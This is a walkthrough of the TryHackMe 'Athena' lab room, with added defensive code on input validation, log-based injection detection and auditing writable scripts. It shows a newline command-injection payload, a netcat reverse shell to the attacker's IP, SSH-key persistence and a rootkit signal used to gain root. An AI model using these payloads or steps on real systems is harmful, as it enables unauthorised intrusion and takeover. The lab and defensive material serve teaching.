Athena TryHackMe Walkthrough

6 months ago 43

Boogsta

Hello guys, today I will be talking you through the room Athena on TryHackMe. The room can be found via the link below.

This room incorporates a lot of cool steps to fully root the machine. As you will see throughout this walkthrough, it isn't as simple as it first seems.

First off we run nmap against the target IP and get back the following result:

Starting Nmap 7.60 ( https://nmap.org ) at 2024-05-07 20:53 BST
Nmap scan report for ip-10-10-231-6.eu-west-1.compute.internal (10.10.231.6)
Host is up (0.0022s latency).
Not shown: 996 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
MAC Address: 02:8C:2B:5B:41:93 (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 1.93 seconds

Breaking this down: port 22 is open running SSH, which we can pass over for now as it usually isn't where we get initial access. There is a web server running on port 80, which we will take a look at, and SMB is running too on port 445 (with NetBIOS on 139). Let's have a look at the website first.

Website

The web server is hosting a static web page. I ran dirb against it and all it found was index.html and server-status, which returned a 403 error. Now we take a look at SMB. We want to enumerate what shares there are, and to do this we are going to use the tool smbclient:

smbclient -L \\\\<ip>\\

This will list the shares on the host and hopefully give us more to go off.

We got lucky! Anonymous login is allowed and we were able to see that there is a share called "public". Now we need to connect to it with the following command:

smbclient \\\\<ip>\\public

Once connected, we list the contents and find there is a note for the administrator. Let's download it and read what it says.

Nice! We have now found our hidden directory. Let's navigate to it and see what we have.

If you have done bug bounty before, it should be obvious what we have to do now; if not, don't worry, I'll be walking you through it here too! We have a tool that allows us to ping a web address both internally and externally. Let's have a look at the output.

If we try to ping google, we get output that looks a little something like this. If you have used the ping command before you'll see this is very similar. What is also interesting is that we could try to append our own command to the end of our input to see if we can get command injection. Let's load up Burp Suite and try a few basic payloads.

If we capture the request and send it over to Repeater we are able to try a few things. First we try the command "| id", which gets filtered and blocked. We could try URL encoding, but that also triggers "Attempt hacking!". HackTricks has a good article on command injection, and the payload that works for us is %0a whoami: as you can see below, www-data appears in the body of the response, so we have successfully found command injection! (%0a is a URL-encoded newline, which the shell treats as a command separator just like ; or |, but which the filter doesn't check for.)
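The filter in this ping tool blocks the obvious separators but lets an encoded newline through. The snippet below is an added illustration, not the room's actual source (the page never shows it): it contrasts a blacklist of the kind the tool appears to use with an allow-list check that accepts only an IP address or a DNS hostname and hands the result to ping as an argv list, so no shell ever parses the user's input. The function names, the blocked-character set and the ping arguments are assumptions made for the example.

```python
import ipaddress
import re
import subprocess
from typing import List, Optional

# A blacklist of the kind the room's ping tool appears to use (assumed for
# illustration; the real filter is not shown on the page). It rejects a few
# shell metacharacters but forgets that a POSIX shell also treats a newline
# as a command separator, which is exactly what the %0a payload relies on.
BLOCKED_CHARS = ("|", ";", "&", "$", "`")


def naive_filter_allows(user_input: str) -> bool:
    """Return True if the blacklist would let this input reach `ping <input>` in a shell."""
    return not any(ch in user_input for ch in BLOCKED_CHARS)


# Allow-list alternative: a hostname is labels of letters, digits and hyphens
# joined by dots (RFC 1123 shape). Anything else, newlines included, is rejected.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)"
    r"([a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)*"
    r"[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?$",
    re.IGNORECASE,
)


def validate_target(user_input: str) -> Optional[str]:
    """Return a canonical IP literal or hostname, or None if the input is not one."""
    candidate = user_input.strip()
    try:
        # ipaddress accepts IPv4 and IPv6 literals and nothing else
        return str(ipaddress.ip_address(candidate))
    except ValueError:
        pass
    if HOSTNAME_RE.match(candidate):
        return candidate
    return None


def build_ping_argv(user_input: str) -> Optional[List[str]]:
    """Build the ping command as an argv list; no shell is involved, so no separators matter."""
    target = validate_target(user_input)
    if target is None:
        return None
    return ["ping", "-c", "4", target]


def run_ping(user_input: str) -> str:
    """The safe sink: subprocess with a list and shell=False (the default)."""
    argv = build_ping_argv(user_input)
    if argv is None:
        return "invalid target"  # the room's app shows "Attempt hacking!" here
    result = subprocess.run(argv, capture_output=True, text=True, timeout=20)
    return result.stdout


if __name__ == "__main__":
    for probe in ("8.8.8.8", "8.8.8.8 | id", "8.8.8.8\nwhoami"):
        print(repr(probe), "blacklist allows:", naive_filter_allows(probe),
              "allow-list accepts:", validate_target(probe) is not None)
```

The blacklist passes the newline variant while rejecting the pipe; the allow-list rejects both, and because the validated value is passed as one argv element there is nothing left for a shell to reinterpret.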

Now that we have command injection, we can try to get a shell on the web server. But if we use a basic bash reverse shell, the "Attempt hacking!" screen appears again, so we need to find something else on the web server we can use. The next go-to would be Python, but this throws the same error. Finally we try netcat, which works! The payload we will use is:

nc -e /bin/sh 10.10.161.13 4545

Change the IP to your machine's IP. Start a netcat listener on your machine with nc -nlvp 4545 and then send the request in Burp!
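From the defender's side, the two requests above leave a clear trace in the web server's access log: a query parameter that decodes to a newline followed by a command name. The detector below is an added example, not part of the original post; the log lines are constructed to resemble Apache combined-log entries for the requests this walkthrough sends (the /ping-tool/ path is a made-up placeholder for the room's hidden directory, which the page does not name).

```python
import re
from typing import Dict, List, Optional
from urllib.parse import parse_qs, urlparse

# Constructed access-log lines (not captured from the room): a legitimate ping,
# the %0a whoami probe and the netcat reverse-shell request from the walkthrough.
SAMPLE_LOG = """\
10.10.161.13 - - [07/May/2024:20:55:01 +0100] "GET /ping-tool/?ip=8.8.8.8 HTTP/1.1" 200 512
10.10.161.13 - - [07/May/2024:20:56:10 +0100] "GET /ping-tool/?ip=8.8.8.8%0awhoami HTTP/1.1" 200 530
10.10.161.13 - - [07/May/2024:20:57:42 +0100] "GET /ping-tool/?ip=8.8.8.8%0anc%20-e%20/bin/sh%2010.10.161.13%204545 HTTP/1.1" 200 18
"""

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)
# Characters a POSIX shell treats as separators or substitution; the newline
# and carriage return are the ones a naive blacklist usually forgets.
SEPARATOR_RE = re.compile(r"[\n\r;|&`$]")
# Command names that have no business inside a hostname parameter.
TOOL_RE = re.compile(r"\b(nc|ncat|bash|sh|python3?|perl|whoami|id)\b")


def analyze_line(line: str) -> Optional[Dict[str, object]]:
    """Parse one access-log line and list why its query parameters look like injection."""
    m = LOG_RE.match(line)
    if not m:
        return None
    # parse_qs percent-decodes values, so %0a becomes a real newline here
    params = parse_qs(urlparse(m["target"]).query)
    reasons: List[str] = []
    for key, values in params.items():
        for value in values:
            if SEPARATOR_RE.search(value):
                reasons.append(f"{key}: shell separator in value")
            if TOOL_RE.search(value):
                reasons.append(f"{key}: shell command keyword in value")
    return {"src": m["src"], "ts": m["ts"], "status": m["status"], "reasons": reasons}


def detect(log_text: str) -> List[Dict[str, object]]:
    """Return only the parsed entries that carry at least one injection indicator."""
    hits = []
    for line in log_text.splitlines():
        entry = analyze_line(line)
        if entry and entry["reasons"]:
            hits.append(entry)
    return hits


if __name__ == "__main__":
    for hit in detect(SAMPLE_LOG):
        print(hit["ts"], hit["src"], "; ".join(hit["reasons"]))
```

Decoding before matching is the important design choice: matching the raw request line for `%0a` would miss the same payload sent as `+`, double-encoded, or in a POST body that has already been decoded by the time it reaches the application log.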

Now the web app side of things is done and the fun begins. We want to move laterally to another user. If we cat the /etc/passwd file we can see there is another user on the system called "athena".

We can also see this in the /home directory

We don't seem to be able to move into /home/athena, so we have to figure out how to become this user! For this we are going to use linpeas to enumerate the machine for us. Start a Python web server on your attacker machine and transfer the linpeas.sh script over to the target with wget, saving it into the /tmp directory.

As you can see I also changed the file permissions with chmod 777 so we can run the script. After it has finished there is a lot to take in, but we will hone in on one specific file: in the "Interesting files owned by me" section of the output we can see a file called "backup.sh".

If we list the directory the file is in, we see that the file's group is athena.

backup.sh is also writable, so now we go and get a bash one-liner reverse shell payload that we can echo into the file. When backup.sh is run by athena we will gain a shell as athena, right?

After waiting around 30 seconds to a minute we get our shell!
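What made this step possible is a script that one account owns and runs on a schedule while another account can write to it. The audit below is an added example (not the room's or linpeas' own code) that walks a directory tree and reports scripts that are world- or group-writable, or that sit in a world-writable directory where anyone can swap the file out. The demo tree it builds is constructed for the example; the file names and contents are assumptions, with backup.sh mirroring the finding on this box.

```python
import os
import shutil
import stat
import tempfile
from typing import List, Tuple

SCRIPT_SUFFIXES = (".sh", ".py", ".pl")


def _looks_like_script(path: str) -> bool:
    """Treat a file as a script if it has a script suffix or starts with a shebang."""
    if path.endswith(SCRIPT_SUFFIXES):
        return True
    try:
        with open(path, "rb") as fh:
            return fh.read(2) == b"#!"
    except OSError:
        return False


def audit_writable_scripts(root: str) -> List[Tuple[str, str]]:
    """Walk `root` and return (path, issue) pairs for scripts another account could modify.

    issue is one of:
      world-writable      any local user can rewrite the script
      group-writable      members of the file's group can rewrite it
      dir-world-writable  the containing directory lets anyone replace the file
    """
    findings: List[Tuple[str, str]] = []
    for dirpath, _dirnames, filenames in os.walk(root):
        try:
            dir_mode = os.lstat(dirpath).st_mode
        except OSError:
            continue
        # A sticky world-writable directory (like /tmp) does not let others replace files
        dir_open = bool(dir_mode & stat.S_IWOTH) and not (dir_mode & stat.S_ISVTX)
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if not stat.S_ISREG(st.st_mode) or not _looks_like_script(path):
                continue
            if st.st_mode & stat.S_IWOTH:
                findings.append((path, "world-writable"))
            elif st.st_mode & stat.S_IWGRP:
                findings.append((path, "group-writable"))
            elif dir_open:
                findings.append((path, "dir-world-writable"))
    return sorted(findings)


def demo_audit() -> List[Tuple[str, str]]:
    """Build a constructed tree resembling this box's finding, audit it, and clean up."""
    root = tempfile.mkdtemp(prefix="athena-audit-")
    try:
        files = {  # name: (mode, contents); all constructed for the example
            "backup.sh": (0o777, "#!/bin/bash\necho backup\n"),   # chmod 777, as on the box
            "deploy":    (0o775, "#!/bin/sh\necho deploy\n"),     # no suffix, shebang, group-writable
            "ok.sh":     (0o755, "#!/bin/bash\necho fine\n"),     # should not be reported
            "notes.txt": (0o777, "not a script\n"),              # writable but not a script
        }
        for name, (mode, body) in files.items():
            path = os.path.join(root, name)
            with open(path, "w") as fh:
                fh.write(body)
            os.chmod(path, mode)
        drop = os.path.join(root, "drop")          # world-writable directory, sane script inside
        os.mkdir(drop)
        job = os.path.join(drop, "job.sh")
        with open(job, "w") as fh:
            fh.write("#!/bin/sh\necho job\n")
        os.chmod(job, 0o755)
        os.chmod(drop, 0o777)
        return [(os.path.relpath(p, root), issue) for p, issue in audit_writable_scripts(root)]
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    for path, issue in demo_audit():
        print(f"{issue:20} {path}")
```

Run against /home, /opt, /etc/cron.d and wherever scheduled jobs live; anything reported that is executed by cron, a service, or sudo on behalf of a more privileged account is the same class of weakness as backup.sh here, and the fix is owner-only write permission plus a non-writable parent directory.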

Now that we are athena we want to make this shell a little more stable. We can do this by setting up SSH. Run ssh-keygen on your attacker machine; afterwards we should see two files, id_rsa and id_rsa.pub, in our directory.

Now in the athena shell we want to cd to the .ssh directory and append the contents of id_rsa.pub to authorized_keys using the command

echo '<content>' >> authorized_keys

Once you've done this, go back to your attacker machine and log in over SSH with your id_rsa key using the command

ssh -i id_rsa athena@<ip>

Perfect, we now have SSH access. Let's run sudo -l and see what we can run as sudo.

I've never seen this before! Let's download the file and open it in Ghidra to see what we have.

Reversing the file, we can see there is a section of code that reads:

__fentry__();
plVar2 = module_previous;
iVar3 = (int)*(undefined8 *)(param_1 + 0x68);
if (iVar3 == 0x39) {
give_root();
__x86_return_thunk();
return;
}

So if iVar3 equals 0x39 we trigger the give_root() function. But what is 0x39? A simple Google search shows us

0x39 equals 57, so if we send signal 57 we should get root! First we have to load the venom.ko kernel module, and then run the command kill -57 0

Congrats you just rooted the box!
